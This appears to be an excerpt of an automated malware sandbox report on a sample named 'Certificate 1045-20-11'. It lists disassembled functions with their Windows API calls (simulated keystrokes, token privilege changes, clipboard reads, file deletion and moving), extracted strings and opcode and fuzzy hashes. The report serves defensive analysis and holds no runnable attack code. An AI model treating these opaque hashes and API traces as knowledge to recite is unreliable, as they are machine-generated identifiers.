                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                • Instruction Fuzzy Hash: D4E0E67494010DDFDB00DFF4D54969E7BF4EF04301F104161FD01E6281D6309D508A62

                                                                                Non-executed Functions

                                                                                Function 008AF7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085B34E: GetWindowLongW.USER32(?,000000EB), ref: 0085B35F
                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 008AF87D
                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008AF8DC
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 008AF919
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008AF940
                                                                                • SendMessageW.USER32 ref: 008AF966
                                                                                • _wcsncpy.LIBCMT ref: 008AF9D2
                                                                                • GetKeyState.USER32(00000011), ref: 008AF9F3
                                                                                • GetKeyState.USER32(00000009), ref: 008AFA00
                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008AFA16
                                                                                • GetKeyState.USER32(00000010), ref: 008AFA20
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008AFA4F
                                                                                • SendMessageW.USER32 ref: 008AFA72
                                                                                • SendMessageW.USER32(?,00001030,?,008AE059), ref: 008AFB6F
                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 008AFB85
                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 008AFB96
                                                                                • SetCapture.USER32(?), ref: 008AFB9F
                                                                                • ClientToScreen.USER32(?,?), ref: 008AFC03
                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 008AFC0F
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 008AFC29
                                                                                • ReleaseCapture.USER32 ref: 008AFC34
                                                                                • GetCursorPos.USER32(?), ref: 008AFC69
                                                                                • ScreenToClient.USER32(?,?), ref: 008AFC76
                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 008AFCD8
                                                                                • SendMessageW.USER32 ref: 008AFD02
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 008AFD41
                                                                                • SendMessageW.USER32 ref: 008AFD6C
                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 008AFD84
                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 008AFD8F
                                                                                • GetCursorPos.USER32(?), ref: 008AFDB0
                                                                                • ScreenToClient.USER32(?,?), ref: 008AFDBD
                                                                                • GetParent.USER32(?), ref: 008AFDD9
                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 008AFE3F
                                                                                • SendMessageW.USER32 ref: 008AFE6F
                                                                                • ClientToScreen.USER32(?,?), ref: 008AFEC5
                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 008AFEF1
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 008AFF19
                                                                                • SendMessageW.USER32 ref: 008AFF3C
                                                                                • ClientToScreen.USER32(?,?), ref: 008AFF86
                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 008AFFB6
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 008B004B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                • String ID: @GUI_DRAGID$F
                                                                                • API String ID: 2516578528-4164748364
                                                                                • Opcode ID: f26a86f1decb2a936f7e3ce6006cd0c609e43cd921fadd8237572357d89cb998
                                                                                • Instruction ID: 19d3b934b9d65060fabfcf6f214b179767e6ae3798f62643111180a186dd29a3
                                                                                • Opcode Fuzzy Hash: f26a86f1decb2a936f7e3ce6006cd0c609e43cd921fadd8237572357d89cb998
                                                                                • Instruction Fuzzy Hash: 4A329A70604345AFEB20DFA8C884FAABBA8FB4A354F040639F695C76A2D731DC05CB51
                                                                                Function 008AAACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 008AB1CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: %d/%02d/%02d
                                                                                • API String ID: 3850602802-328681919
                                                                                • Opcode ID: 712439bf631b76f3853db6c4bd695a13c8f875869e69bcae9b5e7fd422df71e2
                                                                                • Instruction ID: 43538d790b87fef21d67f7002d7f153b9f6b01f82cb05638cb13355417b47f7e
                                                                                • Opcode Fuzzy Hash: 712439bf631b76f3853db6c4bd695a13c8f875869e69bcae9b5e7fd422df71e2
                                                                                • Instruction Fuzzy Hash: AE12BDB1500248ABFB299F68CC49FAE7BB8FF46714F104129FA15DA6D2DB708941CB51
                                                                                Function 0085EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(00000000,00000000), ref: 0085EB4A
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008B3AEA
                                                                                • IsIconic.USER32(000000FF), ref: 008B3AF3
                                                                                • ShowWindow.USER32(000000FF,00000009), ref: 008B3B00
                                                                                • SetForegroundWindow.USER32(000000FF), ref: 008B3B0A
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008B3B20
                                                                                • GetCurrentThreadId.KERNEL32 ref: 008B3B27
                                                                                • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 008B3B33
                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 008B3B44
                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 008B3B4C
                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 008B3B54
                                                                                • SetForegroundWindow.USER32(000000FF), ref: 008B3B57
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 008B3B6C
                                                                                • keybd_event.USER32(00000012,00000000), ref: 008B3B77
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 008B3B81
                                                                                • keybd_event.USER32(00000012,00000000), ref: 008B3B86
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 008B3B8F
                                                                                • keybd_event.USER32(00000012,00000000), ref: 008B3B94
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 008B3B9E
                                                                                • keybd_event.USER32(00000012,00000000), ref: 008B3BA3
                                                                                • SetForegroundWindow.USER32(000000FF), ref: 008B3BA6
                                                                                • AttachThreadInput.USER32(000000FF,?,00000000), ref: 008B3BCD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 4125248594-2988720461
                                                                                • Opcode ID: 6c46277e6ae54e3cdc146bf625f3c0a675467c1b9f07da9bcbb6b8ec5dabedc8
                                                                                • Instruction ID: 1217a62203633921e6cb8fc422a97a4ff7557fbc07e8084ab9f90bd451a20bfe
                                                                                • Opcode Fuzzy Hash: 6c46277e6ae54e3cdc146bf625f3c0a675467c1b9f07da9bcbb6b8ec5dabedc8
                                                                                • Instruction Fuzzy Hash: 1F318671A403187BEB206B659C49FBF7E7CFB84B64F104025FA05EA2D1D6B15D01EAA0
                                                                                Function 0087ACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0087B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0087B180
                                                                                  • Part of subcall function 0087B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0087B1AD
                                                                                  • Part of subcall function 0087B134: GetLastError.KERNEL32 ref: 0087B1BA
                                                                                • _memset.LIBCMT ref: 0087AD08
                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0087AD5A
                                                                                • CloseHandle.KERNEL32(?), ref: 0087AD6B
                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0087AD82
                                                                                • GetProcessWindowStation.USER32 ref: 0087AD9B
                                                                                • SetProcessWindowStation.USER32(00000000), ref: 0087ADA5
                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0087ADBF
                                                                                  • Part of subcall function 0087AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0087ACC0), ref: 0087AB99
                                                                                  • Part of subcall function 0087AB84: CloseHandle.KERNEL32(?,?,0087ACC0), ref: 0087ABAB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                • String ID: $default$winsta0
                                                                                • API String ID: 2063423040-1027155976
                                                                                • Opcode ID: 2cc29cccc33f55c05af88aeb0531ffbaa7b1ae32391a28ea4c49a26878880e5d
                                                                                • Instruction ID: c4bd44924200a8804348444c2f6b57d5b5cc3a1f33ba9701fccaed21ae10ff5e
                                                                                • Opcode Fuzzy Hash: 2cc29cccc33f55c05af88aeb0531ffbaa7b1ae32391a28ea4c49a26878880e5d
                                                                                • Instruction Fuzzy Hash: 83815872900249AFDF159FA4DC49EAEBB79FF44304F048129F918E21A5DB31CE54DB62
                                                                                Function 008860DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00886EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00885FA6,?), ref: 00886ED8
                                                                                  • Part of subcall function 00886EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00885FA6,?), ref: 00886EF1
                                                                                  • Part of subcall function 0088725E: __wsplitpath.LIBCMT ref: 0088727B
                                                                                  • Part of subcall function 0088725E: __wsplitpath.LIBCMT ref: 0088728E
                                                                                  • Part of subcall function 008872CB: GetFileAttributesW.KERNEL32(?,00886019), ref: 008872CC
                                                                                • _wcscat.LIBCMT ref: 00886149
                                                                                • _wcscat.LIBCMT ref: 00886167
                                                                                • __wsplitpath.LIBCMT ref: 0088618E
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 008861A4
                                                                                • _wcscpy.LIBCMT ref: 00886209
                                                                                • _wcscat.LIBCMT ref: 0088621C
                                                                                • _wcscat.LIBCMT ref: 0088622F
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0088625D
                                                                                • DeleteFileW.KERNEL32(?), ref: 0088626E
                                                                                • MoveFileW.KERNEL32(?,?), ref: 00886289
                                                                                • MoveFileW.KERNEL32(?,?), ref: 00886298
                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 008862AD
                                                                                • DeleteFileW.KERNEL32(?), ref: 008862BE
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 008862E1
                                                                                • FindClose.KERNEL32(00000000), ref: 008862FD
                                                                                • FindClose.KERNEL32(00000000), ref: 0088630B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                • String ID: \*.*
                                                                                • API String ID: 1917200108-1173974218
                                                                                • Opcode ID: 39a5b548f7a31910dfa750eba5b3ddbe450d0df6dfd1d7957a046051d42b6a0f
                                                                                • Instruction ID: cb6b14f24a076769db46a3d5c7bf812b1035c97a7ec3f666eda8c26e5465f090
                                                                                • Opcode Fuzzy Hash: 39a5b548f7a31910dfa750eba5b3ddbe450d0df6dfd1d7957a046051d42b6a0f
                                                                                • Instruction Fuzzy Hash: A2510E7280821C6ACB21FBA5DC45DEBB7BCFF05300F0901EAE545E2141EB76A7498FA5
                                                                                Function 00896B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenClipboard.USER32(008DDC00), ref: 00896B36
                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00896B44
                                                                                • GetClipboardData.USER32(0000000D), ref: 00896B4C
                                                                                • CloseClipboard.USER32 ref: 00896B58
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00896B74
                                                                                • CloseClipboard.USER32 ref: 00896B7E
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00896B93
                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 00896BA0
                                                                                • GetClipboardData.USER32(00000001), ref: 00896BA8
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00896BB5
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00896BE9
                                                                                • CloseClipboard.USER32 ref: 00896CF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                • String ID:
                                                                                • API String ID: 3222323430-0
                                                                                • Opcode ID: 8a7ef86d487336d541ff3641fdad5a82825db88ac4af5f4ea9a953e2e18fe80a
                                                                                • Instruction ID: 84f9b50b73bec2ab288e10372912514a6f9799034f257b06f3c514f780ad4be1
                                                                                • Opcode Fuzzy Hash: 8a7ef86d487336d541ff3641fdad5a82825db88ac4af5f4ea9a953e2e18fe80a
                                                                                • Instruction Fuzzy Hash: 66516971200305ABD700BB68DD86F6E77B8FB94B15F040029FA96D62A1EF70E905DA62
                                                                                Function 0088F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0088F62B
                                                                                • FindClose.KERNEL32(00000000), ref: 0088F67F
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0088F6A4
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0088F6BB
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0088F6E2
                                                                                • __swprintf.LIBCMT ref: 0088F72E
                                                                                • __swprintf.LIBCMT ref: 0088F767
                                                                                • __swprintf.LIBCMT ref: 0088F7BB
                                                                                  • Part of subcall function 0086172B: __woutput_l.LIBCMT ref: 00861784
                                                                                • __swprintf.LIBCMT ref: 0088F809
                                                                                • __swprintf.LIBCMT ref: 0088F858
                                                                                • __swprintf.LIBCMT ref: 0088F8A7
                                                                                • __swprintf.LIBCMT ref: 0088F8F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                • API String ID: 835046349-2428617273
                                                                                • Opcode ID: 9dc95460c03782f10d04bb873a22ae0a9d6f0cddb703b9a711242365985de520
                                                                                • Instruction ID: ef4f368e44fd58b09bf81252943bb0423351bc23eebc0a668481c1135340b1eb
                                                                                • Opcode Fuzzy Hash: 9dc95460c03782f10d04bb873a22ae0a9d6f0cddb703b9a711242365985de520
                                                                                • Instruction Fuzzy Hash: 15A10F72404344ABC750EBA8C885DAFB7ECFF98704F44492AF695C2152EB34E949C763
                                                                                Function 00891B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00891B50
                                                                                • _wcscmp.LIBCMT ref: 00891B65
                                                                                • _wcscmp.LIBCMT ref: 00891B7C
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00891B8E
                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00891BA8
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00891BC0
                                                                                • FindClose.KERNEL32(00000000), ref: 00891BCB
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00891BE7
                                                                                • _wcscmp.LIBCMT ref: 00891C0E
                                                                                • _wcscmp.LIBCMT ref: 00891C25
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00891C37
                                                                                • SetCurrentDirectoryW.KERNEL32(008F39FC), ref: 00891C55
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00891C5F
                                                                                • FindClose.KERNEL32(00000000), ref: 00891C6C
                                                                                • FindClose.KERNEL32(00000000), ref: 00891C7C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                • String ID: *.*
                                                                                • API String ID: 1803514871-438819550
                                                                                • Opcode ID: 6765ae2d261053c3a5c49297916908304f06fc0dea51050b8cc7a828d5045a63
                                                                                • Instruction ID: 50e6af24ad7d6e816c4e7861d79b21face359feff4fb12a15ad0e73ea4698cd2
                                                                                • Opcode Fuzzy Hash: 6765ae2d261053c3a5c49297916908304f06fc0dea51050b8cc7a828d5045a63
                                                                                • Instruction Fuzzy Hash: 4D31C33264431A6EDF10BBB4EC4DEEEB7ACFF05324F184166E911D3190EB74DA458A64
                                                                                Function 00891C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00891CAB
                                                                                • _wcscmp.LIBCMT ref: 00891CC0
                                                                                • _wcscmp.LIBCMT ref: 00891CD7
                                                                                  • Part of subcall function 00886BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00886BEF
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00891D06
                                                                                • FindClose.KERNEL32(00000000), ref: 00891D11
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00891D2D
                                                                                • _wcscmp.LIBCMT ref: 00891D54
                                                                                • _wcscmp.LIBCMT ref: 00891D6B
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00891D7D
                                                                                • SetCurrentDirectoryW.KERNEL32(008F39FC), ref: 00891D9B
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00891DA5
                                                                                • FindClose.KERNEL32(00000000), ref: 00891DB2
                                                                                • FindClose.KERNEL32(00000000), ref: 00891DC2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                • String ID: *.*
                                                                                • API String ID: 1824444939-438819550
                                                                                • Opcode ID: 2f76585ab86c973e2e570b76c9c542a1020fa76650e3c456b4ca9e5d8c78c3a9
                                                                                • Instruction ID: 5c0aaaf9ee01b7d2c0d31b894e4b130021348ee6620b82e75d5c811c8a8ca931
                                                                                • Opcode Fuzzy Hash: 2f76585ab86c973e2e570b76c9c542a1020fa76650e3c456b4ca9e5d8c78c3a9
                                                                                • Instruction Fuzzy Hash: 3931D23260461A6ADF10FBB4EC0DEEEB7ACFF45324F180566E811E2191DB74DA458A64
                                                                                Function 00847D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _memset
                                                                                • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                • API String ID: 2102423945-2023335898
                                                                                • Opcode ID: 0afbab006970e2358dfa3ab5163b723e39359690e0cb2c75618dd1db85e1a078
                                                                                • Instruction ID: b9773ef8cec1ad75d4b4b822f5617581a6add8f9c5887f3dcb5e60bd6e0b03b0
                                                                                • Opcode Fuzzy Hash: 0afbab006970e2358dfa3ab5163b723e39359690e0cb2c75618dd1db85e1a078
                                                                                • Instruction Fuzzy Hash: E4825971D0421DDBCB24CF98C8806ADBBB1FF48314F25816AD959EB351E774AE85CB90
                                                                                Function 0089091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 008909DF
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 008909EF
                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008909FB
                                                                                • __wsplitpath.LIBCMT ref: 00890A59
                                                                                • _wcscat.LIBCMT ref: 00890A71
                                                                                • _wcscat.LIBCMT ref: 00890A83
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00890A98
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00890AAC
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00890ADE
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00890AFF
                                                                                • _wcscpy.LIBCMT ref: 00890B0B
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00890B4A
                                                                                Strings
                                                                                Memory Dump Source
